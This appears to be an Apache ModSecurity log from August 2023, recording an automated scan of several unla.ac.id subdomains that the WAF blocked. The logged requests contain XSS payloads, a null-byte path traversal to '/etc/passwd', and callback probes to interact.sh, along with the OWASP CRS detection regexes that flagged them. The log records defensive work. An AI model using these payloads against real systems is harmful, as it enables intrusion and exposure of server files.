[Tue Aug 29 11:55:44.670990 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqY6H0AAAAr"]
[Tue Aug 29 11:55:44.695410 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16UMCo-f0AAAq@sYIAAAAM"]
[Tue Aug 29 11:55:44.695510 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqqti8AAAAA"]
[Tue Aug 29 11:55:45.617344 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqeFa0AAAAx"]
[Tue Aug 29 11:55:45.640931 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqSwzsAAAAN"]
[Tue Aug 29 11:55:45.666512 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqY6IEAAAAr"]
[Tue Aug 29 11:55:45.723729 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqTvxoAAAAa"]
[Tue Aug 29 11:55:45.835654 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UcCo-f0AAAq@sYwAAAAM"]
[Tue Aug 29 11:55:45.877160 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UcCo-f0AAAq@sY4AAAAM"]
[Tue Aug 29 11:55:45.885334 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqeFbUAAAAx"]
[Tue Aug 29 11:55:46.532480 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq@sZEAAAAM"]
[Tue Aug 29 11:55:46.563635 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq-HX8AAAAT"]
[Tue Aug 29 11:55:46.568246 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqY6IkAAAAr"]
[Tue Aug 29 11:55:46.578695 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq@sZMAAAAM"]
[Tue Aug 29 11:55:46.593071 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAApbUn8AAAAh"]
[Tue Aug 29 11:55:46.601168 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAolKwQAAAAe"]
[Tue Aug 29 11:55:46.615114 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqY6IsAAAAr"]
[Tue Aug 29 11:55:46.643657 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqSw0EAAAAN"]
[Tue Aug 29 11:55:46.668915 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAq@sZYAAAAM"]
[Tue Aug 29 11:55:46.669051 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqSw0IAAAAN"]
[Tue Aug 29 11:55:46.670165 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqqtjcAAAAA"]
[Tue Aug 29 11:55:46.687853 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqTvyEAAAAa"]
[Tue Aug 29 11:55:46.689572 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAqSw0MAAAAN"]
[Tue Aug 29 11:55:46.741248 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><svg/o found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAolKwkAAAAe"]
[Tue Aug 29 11:55:46.752282 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAq-HYUAAAAT"]
[Tue Aug 29 11:55:46.773507 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAq@sZoAAAAM"]
[Tue Aug 29 11:55:46.775109 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAolKwoAAAAe"]
[Tue Aug 29 11:55:46.795112 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqSw0cAAAAN"]
[Tue Aug 29 11:55:46.798928 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAq5@F4AAAAK"]
[Tue Aug 29 11:55:47.539044 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqTvyUAAAAa"]
